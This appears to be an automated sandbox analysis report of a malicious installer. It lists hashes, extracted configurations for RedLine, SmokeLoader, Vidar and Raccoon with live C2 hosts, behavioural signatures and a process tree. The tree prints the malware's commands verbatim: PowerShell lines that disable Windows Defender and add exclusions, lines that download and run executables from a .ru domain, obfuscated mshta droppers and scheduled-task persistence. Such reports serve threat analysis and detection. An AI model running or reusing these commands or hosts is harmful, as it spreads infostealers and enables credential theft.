Resubmissions

30-10-2021 19:59

211030-yqs94acafr 10

30-10-2021 19:47

211030-yhtkwscafm 10

30-10-2021 18:51

211030-xhyzyacabn 10

30-10-2021 08:53

211030-ktb84abdfp 10

Analysis

  • max time kernel
    1801s
  • max time network
    1800s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    30-10-2021 08:53

General

  • Target

    setup_x86_x64_install.exe

  • Size

    4.2MB

  • MD5

    2c1278bdd864323e17dd46c7774e0d08

  • SHA1

    4e03a5d24d1d6ed106320778e9135b88f27ecfbe

  • SHA256

    a5e44dd81280a7fbef17c18e528c9df4b1289144fbc107d011af282a69cc3062

  • SHA512

    82a1d89e0692e8037563c92c834a3e3181b52c4423d8d6d860d31d56ef2a3c12083f8ddcc0e058ba7119a7c636938be963c70a14bdc276495e1b1b630ceddd25

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://fortnightgalaxyswapper.ru/sold.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://fortnightgalaxyswapper.ru/Amongus.exe

Extracted

Family

redline

Botnet

srtupdate33

C2

135.181.129.119:4805

Extracted

Family

smokeloader

Version

2020

C2

http://brandyjaggers.com/upload/

http://andbal.com/upload/

http://alotofquotes.com/upload/

http://szpnc.cn/upload/

http://uggeboots.com/upload/

http://100klv.com/upload/

http://rapmusic.at/upload/

rc4.i32
rc4.i32

Extracted

Family

vidar

Version

41.6

Botnet

933

C2

https://mas.to/@lilocc

Attributes
  • profile_id

    933

Extracted

Family

raccoon

Botnet

eae58d570cc74796157b14c575bd3adc01116ca0

Attributes
  • url4cnc

    http://telegka.top/rino115sipsip

    http://telegin.top/rino115sipsip

    https://t.me/rino115sipsip

rc4.plain
rc4.plain

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Turns off Windows Defender SpyNet reporting 2 TTPs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • suricata: ET MALWARE ClipBanker Variant Activity (POST)

    suricata: ET MALWARE ClipBanker Variant Activity (POST)

  • suricata: ET MALWARE FormBook CnC Checkin (GET)

    suricata: ET MALWARE FormBook CnC Checkin (GET)

  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

  • suricata: ET MALWARE Windows dir Microsoft Windows DOS prompt command exit OUTBOUND

    suricata: ET MALWARE Windows dir Microsoft Windows DOS prompt command exit OUTBOUND

  • suricata: ET MALWARE Windows route Microsoft Windows DOS prompt command exit OUTBOUND

    suricata: ET MALWARE Windows route Microsoft Windows DOS prompt command exit OUTBOUND

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 7 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 10 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 5 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 9 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 16 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 17 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 15 IoCs
  • Checks SCSI registry key(s) 3 TTPs 15 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Gathers network information 2 TTPs 4 IoCs

    Uses commandline utility to view network configuration.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 8 IoCs
  • Modifies Internet Explorer settings 1 TTPs 15 IoCs
  • Modifies data under HKEY_USERS 16 IoCs
  • Modifies registry class 23 IoCs
  • Runs net.exe
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
    "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
    1⤵
      PID:3200
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s BITS
      1⤵
      • Suspicious use of SetThreadContext
      • Modifies registry class
      PID:3308
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:5328
    • C:\Windows\system32\DllHost.exe
      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
      1⤵
        PID:3684
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 3684 -s 1004
          2⤵
          • Program crash
          PID:4792
      • C:\Windows\System32\RuntimeBroker.exe
        C:\Windows\System32\RuntimeBroker.exe -Embedding
        1⤵
          PID:3408
        • C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
          "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
          1⤵
            PID:3220
          • C:\Windows\Explorer.EXE
            C:\Windows\Explorer.EXE
            1⤵
            • Drops file in Program Files directory
            • Modifies Internet Explorer settings
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            PID:2960
            • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
              "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2480
              • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                3⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:3080
                • C:\Users\Admin\AppData\Local\Temp\7zS80C751F5\setup_install.exe
                  "C:\Users\Admin\AppData\Local\Temp\7zS80C751F5\setup_install.exe"
                  4⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:2248
                  • C:\Windows\System32\Conhost.exe
                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    5⤵
                      PID:3044
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:508
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
                        6⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3076
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3084
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                        6⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3724
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c Sat016e74da9cbf1.exe
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3612
                      • C:\Users\Admin\AppData\Local\Temp\7zS80C751F5\Sat016e74da9cbf1.exe
                        Sat016e74da9cbf1.exe
                        6⤵
                        • Executes dropped EXE
                        PID:1176
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 744
                          7⤵
                          • Suspicious use of NtCreateProcessExOtherParentProcess
                          • Program crash
                          PID:5740
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c Sat01866e4ba0024d.exe /mixone
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3644
                      • C:\Users\Admin\AppData\Local\Temp\7zS80C751F5\Sat01866e4ba0024d.exe
                        Sat01866e4ba0024d.exe /mixone
                        6⤵
                        • Executes dropped EXE
                        PID:400
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 400 -s 660
                          7⤵
                          • Program crash
                          PID:4256
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 400 -s 636
                          7⤵
                          • Program crash
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4256
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 400 -s 680
                          7⤵
                          • Program crash
                          PID:5060
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 400 -s 680
                          7⤵
                          • Program crash
                          PID:5064
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 400 -s 892
                          7⤵
                          • Program crash
                          PID:5932
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c Sat01e3b3e0fa80800c.exe
                      5⤵
                        PID:3960
                        • C:\Users\Admin\AppData\Local\Temp\7zS80C751F5\Sat01e3b3e0fa80800c.exe
                          Sat01e3b3e0fa80800c.exe
                          6⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2348
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c taskkill /f /im chrome.exe
                            7⤵
                              PID:1288
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /f /im chrome.exe
                                8⤵
                                • Kills process with taskkill
                                PID:6684
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c Sat0188dba58af938.exe
                          5⤵
                          • Suspicious use of WriteProcessMemory
                          PID:588
                          • C:\Users\Admin\AppData\Local\Temp\7zS80C751F5\Sat0188dba58af938.exe
                            Sat0188dba58af938.exe
                            6⤵
                            • Executes dropped EXE
                            • Checks computer location settings
                            PID:2992
                            • C:\Users\Admin\Pictures\Adobe Films\k0c9tSXlluUFlyon0t7vXYAw.exe
                              "C:\Users\Admin\Pictures\Adobe Films\k0c9tSXlluUFlyon0t7vXYAw.exe"
                              7⤵
                              • Executes dropped EXE
                              PID:5680
                            • C:\Users\Admin\Pictures\Adobe Films\ZyMWt3OwylLQGZhccgvmR8zP.exe
                              "C:\Users\Admin\Pictures\Adobe Films\ZyMWt3OwylLQGZhccgvmR8zP.exe"
                              7⤵
                                PID:5392
                                • C:\Program Files (x86)\Company\NewProduct\cutm3.exe
                                  "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
                                  8⤵
                                    PID:3784
                                  • C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe
                                    "C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"
                                    8⤵
                                    • Executes dropped EXE
                                    • Checks whether UAC is enabled
                                    • Drops file in Program Files directory
                                    PID:2200
                                • C:\Users\Admin\Pictures\Adobe Films\2OQQRjWlwWwIPhUnf1RlYd6C.exe
                                  "C:\Users\Admin\Pictures\Adobe Films\2OQQRjWlwWwIPhUnf1RlYd6C.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  PID:5964
                                • C:\Users\Admin\Pictures\Adobe Films\kLOOpxqDdN5cRxZZ4XMlb94e.exe
                                  "C:\Users\Admin\Pictures\Adobe Films\kLOOpxqDdN5cRxZZ4XMlb94e.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  • Checks BIOS information in registry
                                  • Checks whether UAC is enabled
                                  • Suspicious use of SetThreadContext
                                  PID:4988
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                    8⤵
                                      PID:4956
                                  • C:\Users\Admin\Pictures\Adobe Films\Y1xnUMVw6FM2GNJzu_VpmPT_.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\Y1xnUMVw6FM2GNJzu_VpmPT_.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    • Checks BIOS information in registry
                                    • Checks whether UAC is enabled
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    PID:4948
                                  • C:\Users\Admin\Pictures\Adobe Films\y1J8sTaYdUzod4jFmGtlu9PO.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\y1J8sTaYdUzod4jFmGtlu9PO.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    PID:360
                                    • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                      "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                      8⤵
                                      • Executes dropped EXE
                                      PID:4600
                                      • C:\Users\Admin\AppData\Local\Temp\Chrome4 8KB.exe
                                        "C:\Users\Admin\AppData\Local\Temp\Chrome4 8KB.exe"
                                        9⤵
                                          PID:2332
                                        • C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe
                                          "C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe"
                                          9⤵
                                            PID:6116
                                            • C:\Users\Admin\AppData\Roaming\4942778.exe
                                              "C:\Users\Admin\AppData\Roaming\4942778.exe"
                                              10⤵
                                                PID:4648
                                              • C:\Users\Admin\AppData\Roaming\6011221.exe
                                                "C:\Users\Admin\AppData\Roaming\6011221.exe"
                                                10⤵
                                                  PID:5280
                                                • C:\Users\Admin\AppData\Roaming\8893744.exe
                                                  "C:\Users\Admin\AppData\Roaming\8893744.exe"
                                                  10⤵
                                                    PID:6764
                                                    • C:\Windows\SysWOW64\mshta.exe
                                                      "C:\Windows\System32\mshta.exe" vbscRIpT: clOSE ( CReATeObJEct ( "wSCRipT.sHeLL"). RUn ( "C:\Windows\system32\cmd.exe /Q /r TYpe ""C:\Users\Admin\AppData\Roaming\8893744.exe"" >zrvA.exe &&STArt zRva.EXE /PqtlfVLLUzTsVT2Ot9MwAu & If """" == """" for %d in ( ""C:\Users\Admin\AppData\Roaming\8893744.exe"") do taskkill /im ""%~nXd"" -F " , 0 , TrUe ) )
                                                      11⤵
                                                        PID:5204
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\system32\cmd.exe" /Q /r TYpe "C:\Users\Admin\AppData\Roaming\8893744.exe" >zrvA.exe &&STArt zRva.EXE /PqtlfVLLUzTsVT2Ot9MwAu & If "" == "" for %d in ( "C:\Users\Admin\AppData\Roaming\8893744.exe") do taskkill /im "%~nXd" -F
                                                          12⤵
                                                            PID:6516
                                                            • C:\Users\Admin\AppData\Local\Temp\zrvA.exe
                                                              zRva.EXE /PqtlfVLLUzTsVT2Ot9MwAu
                                                              13⤵
                                                                PID:5568
                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                  "C:\Windows\System32\mshta.exe" vbscRIpT: clOSE ( CReATeObJEct ( "wSCRipT.sHeLL"). RUn ( "C:\Windows\system32\cmd.exe /Q /r TYpe ""C:\Users\Admin\AppData\Local\Temp\zrvA.exe"" >zrvA.exe &&STArt zRva.EXE /PqtlfVLLUzTsVT2Ot9MwAu & If ""/PqtlfVLLUzTsVT2Ot9MwAu "" == """" for %d in ( ""C:\Users\Admin\AppData\Local\Temp\zrvA.exe"") do taskkill /im ""%~nXd"" -F " , 0 , TrUe ) )
                                                                  14⤵
                                                                    PID:5640
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "C:\Windows\system32\cmd.exe" /Q /r TYpe "C:\Users\Admin\AppData\Local\Temp\zrvA.exe" >zrvA.exe &&STArt zRva.EXE /PqtlfVLLUzTsVT2Ot9MwAu & If "/PqtlfVLLUzTsVT2Ot9MwAu " == "" for %d in ( "C:\Users\Admin\AppData\Local\Temp\zrvA.exe") do taskkill /im "%~nXd" -F
                                                                      15⤵
                                                                        PID:5232
                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                      "C:\Windows\System32\mshta.exe" vBscriPt: closE ( cREATEObject( "WsCript.Shell" ). RuN ( "C:\Windows\system32\cmd.exe /c EChO | set /P = ""MZ"" > BXCX3.r & COPY /B /y BXCX3.R+ j5IuH.B + 1QL5Dt.T + CPR97qq.W8m + JuDE.JgD _gHPacAe.0 &stArt msiexec.exe /Y .\_GHPacae.0 " , 0 , tRue ) )
                                                                      14⤵
                                                                        PID:1060
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\system32\cmd.exe" /c EChO | set /P = "MZ" > BXCX3.r & COPY /B /y BXCX3.R+ j5IuH.B + 1QL5Dt.T + CPR97qq.W8m + JuDE.JgD _gHPacAe.0&stArt msiexec.exe /Y .\_GHPacae.0
                                                                          15⤵
                                                                            PID:5952
                                                                            • C:\Windows\System32\Conhost.exe
                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              16⤵
                                                                                PID:5292
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /S /D /c" EChO "
                                                                                16⤵
                                                                                  PID:3528
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>BXCX3.r"
                                                                                  16⤵
                                                                                    PID:2828
                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                    msiexec.exe /Y .\_GHPacae.0
                                                                                    16⤵
                                                                                    • Loads dropped DLL
                                                                                    PID:3944
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /im "8893744.exe" -F
                                                                              13⤵
                                                                              • Kills process with taskkill
                                                                              PID:6428
                                                                      • C:\Users\Admin\AppData\Roaming\4070453.exe
                                                                        "C:\Users\Admin\AppData\Roaming\4070453.exe"
                                                                        10⤵
                                                                          PID:4144
                                                                        • C:\Users\Admin\AppData\Roaming\1345006.exe
                                                                          "C:\Users\Admin\AppData\Roaming\1345006.exe"
                                                                          10⤵
                                                                          • Suspicious behavior: SetClipboardViewer
                                                                          PID:6780
                                                                  • C:\Users\Admin\Pictures\Adobe Films\3vuAV6jKujZ8GIqX1RZQ3Omo.exe
                                                                    "C:\Users\Admin\Pictures\Adobe Films\3vuAV6jKujZ8GIqX1RZQ3Omo.exe"
                                                                    7⤵
                                                                      PID:2200
                                                                    • C:\Users\Admin\Pictures\Adobe Films\fELFuNLONpqh4CXb8gBeImG9.exe
                                                                      "C:\Users\Admin\Pictures\Adobe Films\fELFuNLONpqh4CXb8gBeImG9.exe"
                                                                      7⤵
                                                                      • Suspicious use of SetThreadContext
                                                                      PID:4252
                                                                      • C:\Users\Admin\Pictures\Adobe Films\fELFuNLONpqh4CXb8gBeImG9.exe
                                                                        "C:\Users\Admin\Pictures\Adobe Films\fELFuNLONpqh4CXb8gBeImG9.exe"
                                                                        8⤵
                                                                          PID:6748
                                                                      • C:\Users\Admin\Pictures\Adobe Films\zVX52b_P3KRDXQ2FyNVN5xsZ.exe
                                                                        "C:\Users\Admin\Pictures\Adobe Films\zVX52b_P3KRDXQ2FyNVN5xsZ.exe"
                                                                        7⤵
                                                                        • Checks SCSI registry key(s)
                                                                        • Suspicious behavior: MapViewOfSection
                                                                        PID:3260
                                                                      • C:\Users\Admin\Pictures\Adobe Films\oID657dit1lGykSPYG269RJk.exe
                                                                        "C:\Users\Admin\Pictures\Adobe Films\oID657dit1lGykSPYG269RJk.exe"
                                                                        7⤵
                                                                        • Executes dropped EXE
                                                                        • Checks BIOS information in registry
                                                                        • Checks whether UAC is enabled
                                                                        • Suspicious use of SetThreadContext
                                                                        PID:5168
                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                          8⤵
                                                                            PID:4524
                                                                        • C:\Users\Admin\Pictures\Adobe Films\1FCDj_75nlaJn9XX10Hb5QQW.exe
                                                                          "C:\Users\Admin\Pictures\Adobe Films\1FCDj_75nlaJn9XX10Hb5QQW.exe"
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:5032
                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            #cmd
                                                                            8⤵
                                                                              PID:5608
                                                                              • C:\Users\Admin\AppData\Local\Temp\soldd.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\soldd.exe"
                                                                                9⤵
                                                                                  PID:424
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://fortnightgalaxyswapper.ru/sold.exe', (Join-Path -Path $env:AppData -ChildPath 'sold.exe'))" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://fortnightgalaxyswapper.ru/Amongus.exe', (Join-Path -Path $env:UserProfile -ChildPath 'Amongus.exe'))" & powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'sold.exe')" & powershell "Start-Process -FilePath (Join-Path -Path $env:UserProfile -ChildPath 'Amongus.exe')" & exit
                                                                                    10⤵
                                                                                      PID:2996
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                                                                                        11⤵
                                                                                          PID:3264
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                                                                                          11⤵
                                                                                            PID:5856
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell "(New-Object System.Net.WebClient).DownloadFile('https://fortnightgalaxyswapper.ru/sold.exe', (Join-Path -Path $env:AppData -ChildPath 'sold.exe'))"
                                                                                            11⤵
                                                                                            • Blocklisted process makes network request
                                                                                            PID:5820
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell "(New-Object System.Net.WebClient).DownloadFile('https://fortnightgalaxyswapper.ru/Amongus.exe', (Join-Path -Path $env:UserProfile -ChildPath 'Amongus.exe'))"
                                                                                            11⤵
                                                                                            • Blocklisted process makes network request
                                                                                            PID:5600
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'sold.exe')"
                                                                                            11⤵
                                                                                              PID:5248
                                                                                              • C:\Users\Admin\AppData\Roaming\sold.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\sold.exe"
                                                                                                12⤵
                                                                                                  PID:6752
                                                                                                  • C:\Windows\System32\conhost.exe
                                                                                                    "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\sold.exe"
                                                                                                    13⤵
                                                                                                    • Drops file in System32 directory
                                                                                                    PID:6876
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"
                                                                                                      14⤵
                                                                                                        PID:1420
                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                          schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"
                                                                                                          15⤵
                                                                                                          • Creates scheduled task(s)
                                                                                                          PID:6644
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "cmd" cmd /c "C:\Windows\system32\services32.exe"
                                                                                                        14⤵
                                                                                                          PID:7012
                                                                                                          • C:\Windows\system32\services32.exe
                                                                                                            C:\Windows\system32\services32.exe
                                                                                                            15⤵
                                                                                                              PID:4960
                                                                                                              • C:\Windows\System32\conhost.exe
                                                                                                                "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services32.exe"
                                                                                                                16⤵
                                                                                                                • Drops file in System32 directory
                                                                                                                PID:5072
                                                                                                                • C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
                                                                                                                  "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
                                                                                                                  17⤵
                                                                                                                    PID:6712
                                                                                                                    • C:\Windows\System32\conhost.exe
                                                                                                                      "C:\Windows\System32\conhost.exe" "/sihost32"
                                                                                                                      18⤵
                                                                                                                        PID:6012
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell "Start-Process -FilePath (Join-Path -Path $env:UserProfile -ChildPath 'Amongus.exe')"
                                                                                                          11⤵
                                                                                                            PID:2612
                                                                                                            • C:\Users\Admin\Amongus.exe
                                                                                                              "C:\Users\Admin\Amongus.exe"
                                                                                                              12⤵
                                                                                                                PID:5080
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\xxprXi215iiSIR__clsN77uS.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\xxprXi215iiSIR__clsN77uS.exe"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:5312
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\O6M6unoOXZhwtglpcijP_SBZ.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\O6M6unoOXZhwtglpcijP_SBZ.exe"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Windows security modification
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:4760
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\ae255cbe-a852-4ebc-a4c0-ae36f9909b53\AdvancedRun.exe
